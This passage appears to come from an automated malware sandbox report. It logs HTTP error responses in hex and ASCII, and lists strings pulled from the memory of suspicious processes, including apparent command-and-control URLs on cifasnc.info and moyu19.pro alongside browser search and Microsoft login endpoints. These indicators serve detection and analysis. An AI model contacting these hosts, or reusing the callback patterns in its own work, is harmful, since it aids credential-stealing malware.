6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:40:45 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:40:48 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Jan 2025 18:40:17 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Jan 2025 18:40:20 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Jan 2025 18:40:23 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 18:40:25 GMTContent-Type: text/htmlContent-Length: 0Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Fri, 03 Jan 2025 10:41:21 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Fri, 03 Jan 2025 10:41:23 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Fri, 03 Jan 2025 10:41:26 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Fri, 03 Jan 2025 10:41:28 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:41:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Fri, 03 Jan 2025 10:41:48 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OnjKP%2BcKgpmu%2BWe6kBGu0DkTBV0kGn9azM9D6sXqpSa%2FZTAotsCqZPkKOUobqKdhRlJ0ARFHphtAEMwd9WegtKRaczZKK2oYQLYZB657nG0GkpxdIWOTxvaSUZLQM30Kx0IA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc260e8cef54283-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1710&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:41:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Fri, 03 Jan 2025 10:41:51 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HpNq%2FzbsKZ3hZXCJ228v8boqupopXqT1vl7Vvr8Xy5%2BMuSf%2FSqr%2BviKX3jBYkHRLajwvMAZorQzwrNfCW06Rvu7fwwIElNqmrjjKmtJizQrA9l%2FvsqmuHgjObGiAydyqnal"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc260f8bc7d8c0b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1841&rtt_var=920&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 10:41:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Fri, 03 Jan 2025 10:41:54 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajwElZ2UJYR8oEHAPmNGYNSpoGK6vM4J9J2kpNhYRTDIf0NGakl%2Fq44PboPsS9rgO0vxUaeyWSK07vJreOiOGkWNaWCDtuQVh4eCBdVh9N2UMcbcHCjZ0zNAn8R5PNSt2A2V"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc26108ba0a4364-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=812&sent=7&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10833&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 38 Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H8
              Source: fc.exe, 00000005.00000002.4098630415.00000000047E6000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.0000000003E86000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i
              Source: fc.exe, 00000005.00000002.4098630415.00000000047E6000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.0000000003E86000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/xmlrpc.php
              Source: MEREhDqMRRNSzT.exe, 00000006.00000002.4099825496.000000000511C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moyu19.pro
              Source: MEREhDqMRRNSzT.exe, 00000006.00000002.4099825496.000000000511C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moyu19.pro/b9e2/
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: fc.exe, 00000005.00000002.4098630415.000000000400C000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.00000000036AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10339
